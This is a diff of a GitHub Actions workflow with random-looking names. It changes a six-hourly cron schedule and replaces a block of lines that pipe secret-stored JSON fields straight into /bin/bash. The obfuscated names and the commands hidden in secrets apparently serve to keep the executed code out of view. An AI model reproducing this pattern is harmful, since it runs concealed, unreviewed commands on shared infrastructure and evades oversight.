--- a/.github/workflows/tongxiangyu3718.yml
+++ b/.github/workflows/tongxiangyu3718.yml
@@ -3,7 +3,8 @@ name: tongxiangyu3718
 on:
   workflow_dispatch:
   schedule:
-    - cron: '30 1/6 * * *'
+    - cron: '19 1/6 * * *'
+
 jobs:
   build:
     runs-on: ubuntu-latest
@@ -11,18 +12,15 @@ jobs:
       - uses: actions/checkout@v4
       - name: tongxiangyu3718
         env:
-          gozs066: ${{ secrets.gozs066 }}
+          cp5: ${{ secrets.cp5 }}
         run: |
-          echo $gozs066 | jq -r .fkuqf29 | /bin/bash
-          echo $s57 | jq -r .o1124 | /bin/bash
-          echo $nxmr5832 | jq -r .cht47379 | /bin/bash
-          echo $e7 | jq -r .yg09699 | /bin/bash
-          echo $paiz3 | jq -r .phk4 | /bin/bash
-          echo $t245 | jq -r .f4877 | /bin/bash
-          echo $jan972 | jq -r .snjll00925 | /bin/bash
-          echo $i450 | jq -r .j76356 | /bin/bash
-          echo $nof13 | jq -r .xym67 | /bin/bash
-          echo $krddh28 | jq -r .pfwtx0828 | /bin/bash
-          echo $hodoo2771 | jq -r .gnwy17577 | /bin/bash
-          echo $ua8527 | jq -r .z38 | /bin/bash
+          echo $cp5 | jq -r .suwku55 | /bin/bash
+          echo $kpvm91734 | jq -r .o81387 | /bin/bash
+          echo $xkrnn5 | jq -r .z140 | /bin/bash
+          echo $yz19187 | jq -r .gjbkj81232 | /bin/bash
+          echo $ij6 | jq -r .hgb263 | /bin/bash
+          echo $cog14147 | jq -r .f8 | /bin/bash
+          echo $lfrlb5 | jq -r .iu8 | /bin/bash
+          echo $t7 | jq -r .ntlz4129 | /bin/bash
+          echo $sjht3 | jq -r .z3097 | /bin/bash
 
